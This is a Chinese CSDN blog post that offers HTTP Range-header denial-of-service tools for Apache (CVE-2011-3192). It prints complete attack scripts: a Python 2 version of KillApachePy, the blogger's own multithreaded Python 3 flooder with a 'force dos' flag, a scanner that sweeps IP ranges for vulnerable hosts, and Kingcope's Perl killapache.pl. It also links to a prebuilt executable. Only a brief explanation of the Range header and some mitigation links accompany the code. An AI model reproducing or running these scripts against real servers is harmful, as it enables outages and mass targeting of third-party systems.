HTTP RANGE DOS 工具下载

最新推荐文章于 2023-07-05 23:45:00 发布
最新推荐文章于 2023-07-05 23:45:00 发布
阅读量1.9k 收藏
点赞数
分类专栏: python 工具源码 文章标签: dos 工具 domain exception socket
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/7392916
版权

关于绿盟的介绍:

http://www.nsfocus.net/index.php?act=alert&do=view&aid=120


py2版本

#!/usr/bin/env python

import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse

NAME        = "KillApachePy (Range Header DoS CVE-2011-3192)"
VERSION     = "0.1d"
AUTHOR      = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
LICENSE     = "Public domain (FREE)"

SLEEP_TIME      = 3     # time to wait for new thread slots (after max number reached)
RANGE_NUMBER    = 1024  # number of range subitems forming the DoS payload
USER_AGENT      = "KillApachePy (%s)" % VERSION

def attack(url, user_agent=None, method='GET', proxy=None):
    url = ("http://%s" % url) if '://' not in url else url
    host = urlparse.urlparse(url).netloc

    if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
        print "(x) Invalid proxy address used"
        exit(-1)

    proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
    opener = urllib2.build_opener(proxy_support)
    urllib2.install_opener(opener)

    class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2
        def set_method(self, method):
            self.method = method.upper()

        def get_method(self):
            return getattr(self, 'method', urllib2.Request.get_method(self))

    def _send(check=False): #Send the vulnerable request to the target
        if check:
            print "(i) Checking target for vulnerability..."
        payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
        try:
            headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
            req = _MethodRequest(url, None, headers)
            req.set_method(method)
            response = urllib2.urlopen(req)
            if check:
                return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
        except urllib2.URLError, msg:
            if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
                pass
            elif 'timed out' in str(msg):
                print "\r(i) Server seems to be choked ('%s')" % msg
            else:
                print "(x) Connection error ('%s')" % msg
                if check or 'Forbidden' in str(msg):
                    os._exit(-1)
        except Exception, msg:
            raise

    try:
        if not _send(check=True):
            print "(x) Target does not seem to be vulnerable"
        else:
            print "(o) Target seems to be vulnerable\n"
            quit = False
            while not quit:
                threads = []
                print "(i) Creating new threads..."
                try:
                    while True:
                        thread = threading.Thread(target=_send)
                        thread.start()
                        threads.append(thread)
                except KeyboardInterrupt:
                    quit = True
                    raise
                except Exception, msg:
                    if 'new thread' in str(msg):
                        print "(i) Maximum number of new threads created (%d)" % len(threads)
                    else:
                        print "(x) Exception occured ('%s')" % msg
                finally:
                    if not quit:
                        print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
                        time.sleep(SLEEP_TIME)
                        print
    except KeyboardInterrupt:
        print "\r(x) Ctrl-C was pressed"
        os._exit(1)

if __name__ == "__main__":
    print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/index.php\")")
    parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 (Linux)\")")
    parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
    parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
    options, _ = parser.parse_args()
    if options.url:
        result = attack(options.url, options.agent, options.method, options.proxy)
    else:
        parser.print_help()


py3版本:

import threading,argparse,sys,socket,re




parser = argparse.ArgumentParser(description='Http range Dos tools,by Yatere.')


parser.add_argument('-t',help="Trager's IP or domain")
parser.add_argument('-r',default=256,type=int,help="Trager's Threading Number")
parser.add_argument('-f',default=False,type=bool,help="force dos")


args = parser.parse_args()
if args.t ==None:
          parser.print_help()
          sys.exit(1)
          


domain=args.t
threadno=args.r
force=args.f
port=80


p=''
for i in range(1300):
          p=p+',5-'+str(i)


had='HEAD / HTTP/1.1\r\nHost: '+domain+''+'\r\nRange: bytes=0-'+p+'\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n'
had1='HEAD / HTTP/1.1\r\nHost: '+domain+''+'\r\nRange: bytes=0-\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n'






class yk(threading.Thread):
          def __init__(self,domain,port=80):
                    super(yk,self).__init__()
                    self.domain=domain
                    self.port=port
                    self.start()


          def run(self):
                    while True:
                              try:  
                                        a=socket.socket()
                                        a.connect((self.domain,self.port))
                                        a.send(had.encode())
                                        a.close()
                                        print('HEADing\n')
                              except Exception as a:
                                        print (a)
                                        pass
                    




a=socket.socket()
a.connect((domain,port))
a.send(had1.encode())
s=a.recv(1024).decode()
if not force:
          if not s.find('bytes 0-')>0:
                    print('目标服务器貌似不存在本漏洞')
                    sys.exit(1)


                                        
for i in range(threadno):
          yk(domain,port)


扫描脚本。

import threading,sys,socket,iptools,queue




ipstart=sys.argv[1]
ipstop=sys.argv[2]


def had(domain):
          return 'HEAD / HTTP/1.1\r\nHost: '+domain+''+'\r\nRange: bytes=0-\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n'


class yk(threading.Thread):
          def __init__(self,que,port=80):
                    super(yk,self).__init__()
                    self.que=que
                    self.port=port
                    self.start()


          def run(self):
                    while True:
                              if self.que.empty():
                                        break
                              ip=self.que.get()
                              try:
                                        a=socket.socket()
                                        a.connect((ip,self.port))
                                        a.send(had(ip).encode())
                                        s=a.recv(1024).decode()
                                        if s.find('bytes 0-')>1 and s.find('pache')>1 :
                                                  print(ip,'存在Apache Range Dos漏洞')
                                        a.close()
                              except Exception as a:
                                        pass
                              self.que.task_done() 




que=queue.Queue()
for i in iptools.IpRange((ipstart,ipstop)):
          que.put(i)




for i in range(10):
          yk(que)




本代码的可执行程序下载地址:

http://howfile.com/file/2611e8a1/f91052a3/



 以下是国外的介绍:

http://blog.spiderlabs.com/2011/08/mitigation-of-apache-range-header-dos-attack.html

此外pediy上有个帖子总结不错

http://bbs.pediy.com/showthread.php?t=146952


------------------

假设你要开发一个多线程下载工具,你会自然的想到把文件分割成多个部分,比如4个部分,然后创建4个线程,每个线程负责下载一个部分,如果文件大小为 403个byte,那么你的分割方式可以为:0-99 (前100个字节),100-199(第二个100字节),200-299(第三个100字节),300-402(最后103个字节)。

    分割完成,每个线程都明白自己的任务,比如线程3的任务是负责下载200-299这部分文件,现在的问题是:线程3发送一个什么样的请求报文,才能够保证只请求文件的200-299字节,而不会干扰其他线程的任务。这时,我们可以使用HTTP1.1的Range头。Range头域可以请求实体的一个或者多个子范围,Range的值为0表示第一个字节,也就是Range计算字节数是从0开始的:
    表示头500个字节:Range: bytes=0-499
    表示第二个500字节:Range: bytes=500-999
    表示最后500个字节:Range: bytes=-500
    表示500字节以后的范围:Range: bytes=500-
    第一个和最后一个字节:Range: bytes=0-0,-1
    同时指定几个范围:Range: bytes=500-600,601-999
所以,线程3发送的请求报文必须有这一行:
    Range: bytes=200-299

     服务器接收到线程3的请求报文,发现这是一个带有Range头的GET请求,如果一切正常,服务器的响应报文会有下面这行:
HTTP/1.1 206 OK
表示处理请求成功,响应报文还有这一行
Content-Range: bytes 200-299/403
斜杠后面的403表示文件的大小,通常Content-Range的用法为:
     . The first 500 bytes:
     Content-Range: bytes 0-499/1234

     . The second 500 bytes:
     Content-Range: bytes 500-999/1234

     . All except for the first 500 bytes:
     Content-Range: bytes 500-1233/1234

     . The last 500 bytes:
     Content-Range: bytes 734-1233/1234

------------------

国外提供的攻击脚本

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
	print "Apache Remote Denial of Service (memory exhaustion)\n";
	print "by Kingcope\n";
	print "usage: perl killapache.pl <host> [numforks]\n";
	print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
	
$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
	$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next; 	
	
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
	print "host seems vuln\n";
	return 1;	
} else {
	return 0;	
}
}

if ($#ARGV < 0) {
	usage;
	exit;	
}

if ($#ARGV > 1) {
	$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
	print "Host does not seem vulnerable\n";
	exit;	
}
while(1) {
killapache();
}


Yatere
关注
专栏目录
wireshark网络安全分析工具之万文多图详解(持续更新)
herosunly的博客
03-16 8万+
1. 基本介绍 2. 下载与安装 3. 详细教程 3.1 软件界面介绍 3.1.1 菜单栏 3.1.2 工具栏 3.1.3 数据包列表区 3.1.4 数据包详细区 3.1.5 数据包字节区 3.2 Wireshark过滤器 3.2.1 捕获过滤器 3.2.2 显示过滤器 3.3 过滤规则 3.3.1 语法讲解 3.3.2 过滤实例 4. 实战案例......
很好用的dos命令ftp,http工具
07-31
很好用的ftp,http工具,命令行测试自动化可以使用
Slowloris HTTP DoS ***工具介绍
weixin_33951761的博客
03-15 345
Dos***在现在网络中屡见不鲜,下面就介绍其中的一款有名的工具Slowloris HTTP DoS的工作原理,供大家做研究用,如用于非法目的,由此引起的后果自负。In considering the ramifications of a slow denial of service attack against particular services, rather t...
慢速DoS攻击工具slowhttptest(网站压力测试工具
weixin_43456810的博客
11-30 3818
慢速DoS攻击工具slowhttptest(网站压力测试工具) slowhttptest 低带宽的应用层的慢速DoS工具,即通过与目标服务器保持长期的连接,从而将目标服务器的资源耗尽,达到DoS攻击的目的 安装方法 kali中直接安装即可:sudo apt-get install slowhttptest 使用方法 安装完成后,可以先使用slowhttptest -h 命令查看一下参数的解释和使用 如:slowhttptest -c 5000 -u http://... -c:target number o
DOS各版本下载地址
Blaider的专栏
09-23 2065
http://www.allbootdisks.com/download/95.html
DOS boot tool (HPBOOT)
07-05
很实用的一款U盘DOS启动制作工具TOOL
DOS汇编工具DEBUG的参考手册
04-27
### DOS汇编工具DEBUG的参考手册 #### 一、概述 DOS汇编工具DEBUG是一款专为汇编语言设计的调试工具,它可以帮助用户轻松学习8086指令集,并进行程序的调试工作。通过DEBUG,用户可以检查、修改寄存器和内存单元的...
【安全牛学习笔记】拒绝服务攻击工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye
edu_aqniu的博客
10-17 6597
拒绝服务攻击工具                                                   Nmap                                                                    - grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
DOS攻防
赤赤三的博客
03-24 3165
DOS攻防 拒绝服务 原理: 利用程序漏洞或一对一资源耗尽的Denial Service拒绝服务,一对一的攻击完全拼的是各自的资源,效果差(DOS攻击) DDOS分布式拒绝服务(多对一的攻击汇聚资源能力,重点在于量大,属于资源耗尽型) 分类: Dos网络:基于巨量的Flood耗尽目标网络带宽资源:ICMP Flood,UDP FLood Dos协议:攻击协议漏洞发起的拒绝服务攻击:Syn Flood、Ping of Death、ARP、DNS、SSL Dos应用:
DOS-DEBUG教程.doc
11-24
DOS-DEBUG是一个强大的低级调试工具,主要用于在DOS环境下对程序进行调试、分析和修改。它允许用户查看内存内容、执行程序、修改存储单元和跟踪指令执行,是学习汇编语言和底层系统操作的重要工具。 ### DEBUG的...
Dos.Tool:实体生成工具
05-18
Dos.ORM Dos.ORM(原Hxj.Data)于2009年发布、2015年正式开源,该组件已在数百个成熟项目中应用,是目前国内用户量最大、最活跃、最完善的国产ORM。初期开发过程参考了NBear与MySoft,吸取了他们的一些精华,加入新思想,同时参考EF的Lambda语法进行大量扩展。 为什么选择Dos.ORM(原Hxj.Data)? 上手简单,0学习成本。使用方便,按照sql书写习惯编写C#.NET代码。功能强大 高性能,接近手写Sql 体积小(不到150kb,仅一个dll) 完美支持Sql Server(2000至最新版),MySql,Oracle,Access,Sqlite等数据库 支持大量Lambda表达式写法,国产ORM支持度最高,开源中国ORM排行前三 不需要像NHibernate的XML配置,不需要像EF的各种数据库连接驱动 众多成熟企业软件、互联网项目已应用
软件安全测试·DoS·HTTP慢速攻击
06-22
一、攻击原理 2 二、测试用例设计 3 三、测试用例执行结果 4 附:slowhttptest工具使用介绍 5 1. 官方示例 5 2. 结果查看 5
DoSHTTP for DDo attacks
07-10
It is a powerful software to test DDos attacks
http(s)拒绝服务攻击工具--GoldenEye
weixin_43456810的博客
11-30 2228
http/https拒绝服务攻击工具–GoldenEye 获取方法: kali中直接wget: wget https://github.com/jseidl/GoldenEye/archive/master.zip 使用方法: ./goldeneye.py http://... -w 50 ./goldeneye.py http://... -w 50 -m random GoldenEye is a Python 3 app for SECURITY TESTING PURPOSES ONLY! Go
ddoshttp协议、TCP协议攻击工具及使用方法(Hyenae、SlowHTTPTest、Torshammer、Pyloris、Zarp)
网络安全领域优质创作者
10-19 5935
Hyenae : 不做推荐介绍,因为把我自己的路由器玩崩了,本地路由器响应不了那么多的请求,本地电脑不要轻易尝试。感兴趣的自行百度。 SlowHTTPTest:很好用。 Slowhttptest是依赖HTTP协议的慢速攻击DoS攻击工具,设计的基本原理是服务器在请求完全接收后才会进行处理,如果客户端的发送速度缓慢或者发送不完整,服务端为其保留连接资源池占用,大量此类请求并发将导致DoS。 攻...
Slowhttptest----DoS攻击工具
最新发布
汪敏的博客
07-05 1397
Slowhttptest----DoS攻击工具
DDos/DoS工具集(持续更新)
onephone的专栏
01-22 7692
项目中,需要帮助某公司完成对几台抗DDoS设备的测试,受限于各类因素,只能通过搭建软件环境来完成测评。下面是针对自己前期工作的一小部分整理,仅罗列了基于开源工具的一些内容,其他定制化的和自己编写的程序则未公开。hping、LOIC等其他工具,由于性能和其它原因也未被使用! github ddos-dos-tools 1. SynFlood 攻击 借助netsniff-ng套件中的
拒绝服务(DoS)理解、防御与实现
weixin_33958585的博客
09-27 371
一、说明 我一直不明白为什么拒绝服务,初学着喜欢拿来装逼、媒体喜欢吹得神乎其神、公司招聘也喜欢拿来做标准,因为我觉得拒绝服务和社会工程学就是最名不副实的两样东西。当然由于自己不明确拒绝服务在代码上是怎么个实现过程,所以虽然如此认为但不免底气不足。趁着有时间来考究一番。   二、拒绝服务定义 Denial of Service,简写DoS,拒绝服务是英文名直接翻译,指的是正常用户无法得到服务的现像。...
Android自定义下载工具实现与原理分析
"Android实现下载工具的简单代码,包括多线程、断点续传下载,以及下载管理功能的实现" 在Android开发中,创建一个自定义的下载工具是非常常见的需求,尤其是在开发需要下载大量数据的应用时。这个工具通常需要具备...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值